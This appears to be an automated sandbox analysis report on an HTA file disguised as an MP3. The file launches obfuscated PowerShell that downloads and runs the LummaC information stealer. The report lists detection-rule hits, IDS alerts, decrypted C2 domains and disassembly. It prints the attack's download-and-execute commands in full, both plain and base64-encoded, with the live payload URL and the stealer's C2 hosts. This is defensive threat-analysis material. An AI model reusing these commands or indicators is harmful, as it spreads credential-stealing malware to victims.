C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\rii2.mp3.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2084, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ProcessId: 6536, ProcessName: powershell.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\rii2.mp3.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2084, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ProcessId: 6536, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T17:25:23.601900+010020283713Unknown Traffic192.168.2.649992188.114.97.3443TCP
              2025-01-12T17:25:24.864196+010020283713Unknown Traffic192.168.2.649993104.102.49.254443TCP
              2025-01-12T17:25:25.992394+010020283713Unknown Traffic192.168.2.649994104.21.14.233443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T17:25:24.074509+010020546531A Network Trojan was detected192.168.2.649992188.114.97.3443TCP
              2025-01-12T17:25:26.436129+010020546531A Network Trojan was detected192.168.2.649994104.21.14.233443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T17:25:24.074509+010020498361A Network Trojan was detected192.168.2.649992188.114.97.3443TCP
              2025-01-12T17:25:26.436129+010020498361A Network Trojan was detected192.168.2.649994104.21.14.233443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T17:25:25.390632+010028586661Domain Observed Used for C2 Detected192.168.2.649993104.102.49.254443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://grandiouseziu.biz/apiAvira URL Cloud: Label: malware
              Source: https://truculengisau.biz/api)OAvira URL Cloud: Label: malware
              Source: https://truculengisau.biz/apiAvira URL Cloud: Label: malware
              Source: https://punishzement.biz/apicOAvira URL Cloud: Label: malware
              Source: https://punishzement.biz/apiAvira URL Cloud: Label: malware
              Source: https://nuttyshopr.biz/jAvira URL Cloud: Label: malware
              Source: 10.2.powershell.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["punishzement.biz", "truculengisau.biz", "spookycappy.biz", "marketlumpe.biz", "fraggielek.biz", "littlenotii.biz", "nuttyshopr.biz", "degreehourz.click", "grandiouseziu.biz"]}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: truculengisau.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: spookycappy.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: punishzement.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: nuttyshopr.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: marketlumpe.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: littlenotii.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: grandiouseziu.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: fraggielek.biz
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: degreehourz.click
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
              Source: 10.2.powershell.exe.400000.0.raw.unpackString decryptor: Workgroup: -
              Source: unknownHTTPS traffic detected: 104.26.11.53:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49992 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49993 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.14.233:443 -> 192.168.2.6:49994 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06A364BCh4_2_06A36298
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06A364BCh4_2_06A36288
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06A35EFCh4_2_06A35AE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06A35EFCh4_2_06A35AD2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06FA476Fh4_2_06FA474D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06FA476Fh4_2_06FA498D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_0040A69A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]10_2_0040BFA3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-52h]10_2_0040BFA3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_00439050
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 53585096h10_2_0043C070
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+4EB141A7h]10_2_0041B0E3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_0042F884
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h10_2_00419900
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx+4EB141A7h]10_2_0041B102
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edi], ax10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp], ecx10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edi], ax10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h10_2_00422110
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+383C1539h]10_2_004151CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-0B9AB585h]10_2_004151CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+20h]10_2_004151CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-6BC65809h]10_2_00426240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+690FBAEBh]10_2_00426240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax10_2_00426240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, ecx10_2_0042F244
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebp+00h], cl10_2_00428A70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_0042C210
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]10_2_00402230
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebp+00h], cl10_2_00428A90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1F5D46FCh]10_2_0042E370
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]10_2_0041CB05
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]10_2_0041CB1E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h10_2_0042DB30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6F32DC84h10_2_0043EBF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx+623C7411h]10_2_00427BF1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [edi+ecx+623C7411h]10_2_00427BF1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edi], ax10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp], ecx10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edi], ax10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h10_2_0043EB80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00414390
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_0040C3A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+28h]10_2_0040A3AE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_0042FC56
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl10_2_0041BC32
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl10_2_0041BC32
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_004184C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax10_2_0043ACD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], cx10_2_0040E483
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]10_2_0041F4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000001D7h]10_2_0040CD77
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, eax10_2_0040CD77
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax10_2_0040CD77
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6A911B6Ch10_2_00415D7C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h10_2_0042AD00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000A9h]10_2_0042A5C0
